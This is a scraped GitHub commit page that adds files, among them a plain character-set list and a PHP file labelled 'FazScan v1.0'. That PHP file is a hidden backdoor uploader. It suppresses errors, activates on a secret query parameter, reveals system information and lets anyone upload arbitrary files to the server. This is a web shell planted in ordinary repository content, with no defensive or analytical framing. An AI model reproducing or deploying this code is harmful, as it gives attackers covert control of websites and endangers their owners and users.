-
Notifications
You must be signed in to change notification settings - Fork 32
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
b0d7ce4
commit de08355
Showing
3 changed files
with
7,539 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
4 | ||
|
||
|
||
big5,big5_chinese_ci,Big5 Traditional Chinese,2 | ||
|
||
dec8,dec8_swedish_ci,DEC West European,1 | ||
|
||
cp850,cp850_general_ci,DOS West European,1 | ||
|
||
hp8,hp8_english_ci,HP West European,1 | ||
|
||
koi8r,koi8r_general_ci,KOI8-R Relcom Russian,1 | ||
|
||
latin1,latin1_swedish_ci,cp1252 West European,1 | ||
|
||
latin2,latin2_general_ci,ISO 8859-2 Central European,1 | ||
|
||
swe7,swe7_swedish_ci,7bit Swedish,1 | ||
|
||
ascii,ascii_general_ci,US ASCII,1 | ||
|
||
ujis,ujis_japanese_ci,EUC-JP Japanese,3 | ||
|
||
sjis,sjis_japanese_ci,Shift-JIS Japanese,2 | ||
|
||
hebrew,hebrew_general_ci,ISO 8859-8 Hebrew,1 | ||
|
||
tis620,tis620_thai_ci,TIS620 Thai,1 | ||
|
||
euckr,euckr_korean_ci,EUC-KR Korean,2 | ||
|
||
koi8u,koi8u_general_ci,KOI8-U Ukrainian,1 | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
<html> | ||
<!-- FazScan v1.0 --> | ||
</html> | ||
|
||
<?php | ||
|
||
error_reporting(0); | ||
set_time_limit(0); | ||
|
||
if($_GET['A']=="FazScan") { | ||
echo "<center><b>Uname :".php_uname()."<br></b>"; | ||
echo '<font color="black" size="4">'; | ||
if(isset($_POST['Submit'])){ | ||
$filedir = ""; | ||
$maxfile = '2000000'; | ||
$mode = '0644'; | ||
$userfile_name = $_FILES['image']['name']; | ||
$userfile_tmp = $_FILES['image']['tmp_name']; | ||
if(isset($_FILES['image']['name'])) { | ||
$qx = $filedir.$userfile_name; | ||
@move_uploaded_file($userfile_tmp, $qx); | ||
@chmod ($qx, octdec($mode)); | ||
echo " <a href=$userfile_name><center><b>Success Uploaded :) --> $userfile_name</b></center></a>"; | ||
} | ||
} else { | ||
echo '<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; | ||
} | ||
echo '</center></font>'; | ||
|
||
} | ||
?> |
Oops, something went wrong.